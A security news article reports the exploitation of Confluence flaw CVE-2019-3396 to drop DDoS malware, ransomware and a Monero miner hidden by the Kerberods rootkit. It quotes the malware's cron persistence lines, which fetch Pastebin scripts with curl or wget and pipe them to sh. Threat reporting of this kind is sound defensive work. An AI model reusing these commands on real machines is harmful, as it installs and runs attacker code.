After being hit with ransomware and with malware that launches distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now being compromised to mine cryptocurrency.
On March 20, Atlassian released patches for two critical-severity vulnerabilities affecting Confluence Server and Confluence Data Center. One of them, CVE-2019-3396, is a server-side template injection in the Widget Connector that can lead to remote code execution.
Three weeks later, cybercriminals created the first exploit for this security bug and started hitting vulnerable Confluence servers. Troy Mursch of the security company Bad Packets noticed exploitation activity from an IP address in Romania dropping the Dofloo DDoS malware.
We've detected opportunistic exploitation from 184.108.40.206 targeting a critical Atlassian Confluence Server vulnerability (CVE-2019-3396) that allows remote code execution. The attacker drops Dofloo #malware, which is used for DDoS attacks.— Bad Packets Report (@bad_packets) April 10, 2019
Other exploits were created and researchers soon saw GandCrab ransomware dropped on vulnerable Confluence instances running on Windows.
In a report today, Augusto Remillano II and Robert Malagad detail a new attack leveraging the same vulnerability to deliver a Monero cryptocurrency miner with a rootkit component.
The attack starts by sending a command to download a shell script hosted on Pastebin. After killing some processes, the script downloads and runs another shell script, also from a Pastebin address. This sequence repeats with a third shell script that gets a trojan dropper.
The malware, kerberods (detected as Trojan.Linux.KERBERDS.A), is a custom-packed binary that installs itself via cron jobs:
*/10 * * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15 * * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/10 * * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15 * * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O- hxxps://pastebin[.]com/raw/rPB8eDpu)|sh
Kerberods finally retrieves the Monero miner (khugepageds) and the rootkit component. The researchers highlight that the rootkit is delivered as source code and is compiled into a binary with the GNU Compiler Collection (GCC).
The rootkit features several self-propagation methods that use SSH connections, as well as a Metasploit module for exploiting the CVE-2019-1003001 vulnerability in the Jenkins automation server.
Kerberods' main purpose, however, is to hide the cryptojacking activity, its files, and its network traffic. The researchers say it can also report arbitrary CPU usage figures on the affected machine, again in an effort to conceal the mining process.
An attack with a striking resemblance to this one occurred in November 2018, when the threat actor also deployed a rootkit and cryptominer combination to hide the cryptojacking activity.